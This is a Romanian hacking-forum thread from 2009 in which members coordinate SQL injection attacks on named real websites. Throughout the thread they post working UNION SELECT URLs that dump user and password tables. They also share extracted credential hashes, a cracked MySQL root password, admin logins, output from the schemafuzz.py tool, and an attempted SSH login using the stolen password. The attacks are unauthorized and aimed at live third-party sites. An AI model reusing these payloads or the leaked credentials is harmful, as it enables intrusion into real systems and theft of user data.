Flubber Posted January 11, 2009 Report Share Posted January 11, 2009 Salut baieti,am incercat SQL Injection in: http://proiecte.nipne.ro/ am aflat ca foloseste versiunea 4 ( http://proiecte.nipne.ro/pn2/index_en.php?id=1+AND+1=0+UNION+SELECT+ALL+concat_ws(0x3a,version(),user(),database())-- ) si am ajuns la stadiul unde trebuie sa ghicesc numele tabelului ( http://proiecte.nipne.ro/pn2/index_en.php?id=-1+UNION+SELECT+ALL+group_concat(schema_name)+from+information_schema.schemata-- ) ...putin ajutor?P.S.: daca nu am postat unde trebuia, rog un moderator/administrator sa imi mute post-ul si topic-ul, multumesc Quote Link to comment Share on other sites More sharing options...
pacealik Posted January 11, 2009 Report Share Posted January 11, 2009 daca e versiunea 4 nu ai ce sa ii faci decat sa ghicesti tabelele ......e mai greupe asta l-am luat si eu acum cateva zile si i-am dat pace cand am vazut ca are versiunea 4 Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 11, 2009 Author Report Share Posted January 11, 2009 daca e versiunea 4 nu ai ce sa ii faci decat sa ghicesti tabelele ......e mai greupe asta l-am luat si eu acum cateva zile si i-am dat pace cand am vazut ca are versiunea 4am inteles, ms pentru ajutor Quote Link to comment Share on other sites More sharing options...
Caracal Posted January 11, 2009 Report Share Posted January 11, 2009 http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(utilizator,parola)%20from%20utilizatori-- Quote Link to comment Share on other sites More sharing options...
Caracal Posted January 12, 2009 Report Share Posted January 12, 2009 http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(utilizator,0x3a,parola)%20from%20utilizatori--uite..mai frumosmid:midullaur:laurstefan_carstea:nicoleta Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 12, 2009 Author Report Share Posted January 12, 2009 http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(utilizator,0x3a,parola)%20from%20utilizatori--uite..mai frumosmid:midullaur:laurstefan_carstea:nicoletafrumos, e bun si "0x3a" asta la ceva, macar la despartit alea 3 banuiesc ca sunt MD5 si atat nu? nu sunt salty md5thx Quote Link to comment Share on other sites More sharing options...
Caracal Posted January 12, 2009 Report Share Posted January 12, 2009 toate sunt md5 Quote Link to comment Share on other sites More sharing options...
MrRip Posted January 12, 2009 Report Share Posted January 12, 2009 unix_chro cred ca ai gresit postul este altu cu e-manele asta este cu altceva oricum ... np . Flubber check this out sper sa te ajute http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(user,0x3a,password)%20from%20mysql.user-- Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 12, 2009 Author Report Share Posted January 12, 2009 unix_chro cred ca ai gresit postul este altu cu e-manele asta este cu altceva oricum ... np . Flubber check this out sper sa te ajute http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(user,0x3a,password)%20from%20mysql.user--mersi, sa le trimitem mail spunandu-le ca au vulnerabilitati? Quote Link to comment Share on other sites More sharing options...
Guest Praetorian Posted January 12, 2009 Report Share Posted January 12, 2009 Da...daca era altu, .com, .net mai ziceam... Dar daca este .ro, sa ajutam Quote Link to comment Share on other sites More sharing options...
MrRip Posted January 12, 2009 Report Share Posted January 12, 2009 Da...daca era altu, .com, .net mai ziceam... Dar daca este .ro, sa ajutam sunt de acord cu TinKode Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 12, 2009 Author Report Share Posted January 12, 2009 altul: http://www.apd.ro/publicatie.php?id=51+AND+1=0+UNION+SELECT+ALL+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12--+ http://www.apd.ro/admin/login.php , aoleuu xDiar la ghicit coloane? are cineva un script care sa "rasfoiasca" (sa incerce diferite nume de coloane)sau ce script-uri anume speciale de SQL Injection aveti? ce imi recomandati?off: urasc ca nu pot sa schimb semnatura Quote Link to comment Share on other sites More sharing options...
Guest Praetorian Posted January 12, 2009 Report Share Posted January 12, 2009 Ma tu crezi ca daca folosesti scripturi, programe rezolvi ceva?Mai bine ai incerca sa faci tu cu mintea ta.. fara ajutorul nici unui program.. Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 12, 2009 Author Report Share Posted January 12, 2009 Ma tu crezi ca daca folosesti scripturi, programe rezolvi ceva?Mai bine ai incerca sa faci tu cu mintea ta.. fara ajutorul nici unui program..aha, ms oricum, voi incerca si varianta asta Quote Link to comment Share on other sites More sharing options...
Caracal Posted January 12, 2009 Report Share Posted January 12, 2009 http://www.darkc0de.com/others/schemafuzz.pypython schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"dupa ce iti gaseste:python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my ass Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 13, 2009 Author Report Share Posted January 13, 2009 http://www.darkc0de.com/others/schemafuzz.pypython schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"dupa ce iti gaseste:python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my asssuper, multumesc mult, in sfarsit ceea ce asteptam desi TinKode are dreptate (stie el ce zice) Quote Link to comment Share on other sites More sharing options...
Guest Praetorian Posted January 13, 2009 Report Share Posted January 13, 2009 Ma Caracal, nu am zis ca scripturile sunt naspa...Dar care mai este farmecul, cand tu doar bagi in cmd niste cuvinte si iti face toata treaba...Una e cand dai scan dupa ele, apoi le faci cu diferite scripturi, decat cand cauti singur sa vezi daca e vulnerabil, si sa faci TU injectia manual. Quote Link to comment Share on other sites More sharing options...
djdynutzu Posted January 15, 2009 Report Share Posted January 15, 2009 Stie cineva de unde sa iau decrypter pt md5 am incercat pe site-uri da nu merge ! Quote Link to comment Share on other sites More sharing options...
Guest Praetorian Posted January 15, 2009 Report Share Posted January 15, 2009 Daca ai multe hash-uri md5 si chiar vrei sa le decryptezi bagati in comp rainbow tables. Quote Link to comment Share on other sites More sharing options...
d3v1l Posted January 15, 2009 Report Share Posted January 15, 2009 http://3.14.by/en/md5 cel mai bun la ora actuala Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 16, 2009 Author Report Share Posted January 16, 2009 http://www.aries.ro - vulnerabil[+] URL:http://www.aries.ro/index.php?lang_id=2+AND+1=2+UNION+SELECT+darkc0de--[+] Evasion Used: "+" "--"[+] 02:20:54[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: aries_site User: root@localhost Version: 5.0.67[+] Number of tables names to be fuzzed: 347[+] Number of column names to be fuzzed: 277[+] Searching for tables and columns...[+] Found a table called: admin[+] Now searching for columns inside table "admin"[!] Found a column called:user[!] Found a column called:pass[!] Found a column called:id[-] Done searching inside table "admin" for columns![+] Found a table called: company[+] Now searching for columns inside table "company"[!] Found a column called:id[!] Found a column called:login[-] Done searching inside table "company" for columns![+] Found a table called: mysql.user[+] Now searching for columns inside table "mysql.user"[!] Found a column called:user[!] Found a column called:password[-] Done searching inside table "mysql.user" for columns![+] Found a table called: news[+] Now searching for columns inside table "news"[!] Found a column called:id[-] Done searching inside table "news" for columns![+] Found a table called: users[+] Now searching for columns inside table "users"[!] Found a column called:password[!] Found a column called:id[!] Found a column called:email[!] Found a column called:login[-] Done searching inside table "users" for columns![-] [02:36:10][-] Total URL Requests 1733[-] Doneam obtinut:user,pass din mysql.userroot:3c8c1a8e271e4bad (MySQL Hash) ---> root:toorinca ceva: www.aries.ro/admin (user,id,pass din admin -> user: admin ; id: admin ; pass: 1)am mai descoperit ca te poti conecta la aries.ro (prin DNS ip-ul este: 194.102.253.145) prin SSH 22, am incercat user-ul root, pass toor (din decriptarea hash-ului de mai sus) dar nu a mers.... acum am o nelamurire, toate userele astea unde le pot folosi? (nici la /admin nu au mers) Quote Link to comment Share on other sites More sharing options...
redking Posted January 17, 2009 Report Share Posted January 17, 2009 ce program folosesti? Quote Link to comment Share on other sites More sharing options...
Flubber Posted January 18, 2009 Author Report Share Posted January 18, 2009 ce program folosesti?script .py "schema fuzz"http://www.darkc0de.com/others/schemafuzz.py Quote Link to comment Share on other sites More sharing options...
playftw Posted February 1, 2009 Report Share Posted February 1, 2009 unix_chro ce program ai folosit? Quote Link to comment Share on other sites More sharing options...
redking Posted February 1, 2009 Report Share Posted February 1, 2009 http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user Quote Link to comment Share on other sites More sharing options...
